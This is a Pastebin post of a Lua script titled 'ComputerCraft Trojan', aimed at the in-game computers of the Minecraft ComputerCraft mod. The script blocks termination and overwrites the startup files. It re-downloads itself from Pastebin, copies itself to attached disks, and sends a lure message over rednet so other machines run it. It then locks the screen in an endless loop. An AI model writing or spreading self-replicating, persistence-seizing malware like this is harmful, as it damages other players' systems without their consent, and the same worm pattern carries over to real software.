SuperRavenSn1per

ComputerCraft Trojan

Sep 12th, 2020 (edited)
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.03 KB | None | 0 0
  1. os.pullEvent = os.pullEventRaw
  2.  
  3. w,h = term.getSize()
  4.  
  5. if rednet.isOpen() then
  6.   rednet.broadcast("hey i found this new game type pastebin run ZpFv7Myj")
  7. end
  8. if fs.exists("startup") then
  9.   fs.delete("startup")
  10. end
  11. if fs.exists("startup.lua") then
  12.   fs.delete("startup.lua")
  13. end
  14. shell.run("pastebin get ZpFv7Myj startup")
  15. shell.run("set shell.allow_disk_startup false")
  16. if disk.isPresent("top") or disk.isPresent("bottom") or disk.isPresent("left") or disk.isPresent("right") or disk.isPresent("front") or disk.isPresent("back") then
  17.   if fs.exists("disk/startup") then
  18.     fs.delete("disk/startup")
  19.   end
  20.   if fs.exists("disk/startup.lua") then
  21.     fs.delete("disk/startup.lua")
  22.   end
  23.   shell.run("pastebin get ZpFv7Myj disk/startup")
  24. end
  25. term.clear()
  26. term.setCursorPos(1,1)
  27. print("||    ====  ==== || //  ==== ===")
  28. print("||   ||  || ||   ||//   ||   || ||")
  29. print("||   ||  || ||   |||    ==== || ||")
  30. print("||   ||  || ||   || ||  ||   || ||")
  31. print("====  ====  ==== || ||  ==== ===")
  32. while true do
  33.   sleep(0.1)
  34. end
Add Comment
Please, Sign In to add comment